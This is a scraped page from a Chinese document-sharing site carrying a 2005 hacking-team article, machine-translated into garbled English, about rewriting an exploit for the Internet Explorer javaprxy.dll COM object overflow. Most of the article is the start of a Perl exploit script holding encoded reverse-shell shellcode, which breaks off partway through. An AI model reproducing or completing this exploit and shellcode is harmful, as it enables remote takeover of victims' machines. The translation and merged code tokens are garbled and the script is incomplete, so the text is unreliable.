- 1、本文档共15页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
iejavaprxy.dllcomobject漏洞利用程序改写手记(Iejavaprxy.dllcomobject exploits rewrite notes)
iejavaprxy.dllcomobject漏洞利用程序改写手记(Iejavaprxy.dllcomobject exploits rewrite notes)
[original]IEjavaprxy.dllCOMObject exploits rewrite notes
Article title: [original]IEjavaprxy.dllCOMObject exploits the top notes of the most lonely invincible rewrite published: 2005-07-0721:46 [[original landlord]IEjavaprxy.dllCOMObject exploits rewrite notes
Article author: Invincible most lonely [E.S.T]
Source: Evil octal information security team ()
MicrosoftInternetExplorerjavaprxy.dllCOMObject overflow vulnerability was released just two days ago, and I have also sent a similar vulnerability. The principle of this loophole, I do not say much, in short, is a hole in the IE. The use of vulnerability still uses violence to expand memory, and I modify it here mainly for shellcode.
Local monitoring of the shellcode is not worth much, or reverse, more comfortable. But this shellcode modification is not so easy, so in order to prevent shellcode from being encoded by Unicode, a little bit of action is needed.
I have written the entire program, as follows, fully Perl code:
Copycode
# /usr/bin/perl!
#doomie.pl
Usestrict;
UseSocket;
My$reverse_shell= \xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA
\xEB\x05\xE8\xEB\xFF\xFF\xFF
\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12
\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99
\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12
\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99
\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9
\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D
\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA
\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32
\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10
\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8
\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66
The \xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x9
您可能关注的文档
- 2011年安徽普通高中学业水平考试·化学真题(In 2011 the Anhui ordinary high school proficiency test, chemical test).doc
- 2011年工作总结 总结(Summary of work in 2011).doc
- 2011年施工技术员个人工作总结(Personal work summary of construction technician in 2011).doc
- 2011年度全球10大科学突破(Top 10 scientific breakthroughs in 2011).doc
- 2011年必读10本书(10 books are required in 2011).doc
- 2011年磷矿石出口配额申报条件及程序的公告(Announcement on the conditions and procedures for the declaration of phosphorus ore export quotas in 2011).doc
- 2011年江西省南昌市中考语文试题及答案(Chinese examination questions and answers in Jiangxi, Nanchang in 2011).doc
- 2011年胡润财富排行榜(Hurun wealth list in 2011).doc
- 2011年陕西高考数学试题及答案(理科)(Mathematics examination questions and answers of Shaanxi college entrance examination in 2011 (Science)).doc
- 2011年青浦区高三化学一模试卷(附答案)(Qingpu District in 2011 the first mock exam papers of Senior Chemistry (with answers)).doc
- ie与ff的兼容性问题(Compatibility issues between IE and FF).doc
- ie主页被篡改后注册表修复(The IE home page has been tampered with before the registry is repaired).doc
- ie和firefox在javascript方面的兼容性(Compatibility of IE and Firefox in JavaScript).doc
- ie与firefox的css兼容问题(CSS compatibility issues with IE and Firefox).doc
- ie和firefox的js兼容性整理(JS compatibility with IE and Firefox).doc
- ie和火狐的css兼容(Ie is compatible with Firefox's CSS).doc
- ie和ff兼容问题(IE and FF compatibility issues).doc
- ie和firefox兼容(Ie compatible with Firefox).doc
- iis apache+php+mysql+zend optimizer+phpmyadmin安装配置(IIS,Apache + PHP + MySQL + Zend Optimizer + phpMyAdmin安装配置).doc
- imageurl数据绑定(imageurl数据绑定).doc
文档评论(0)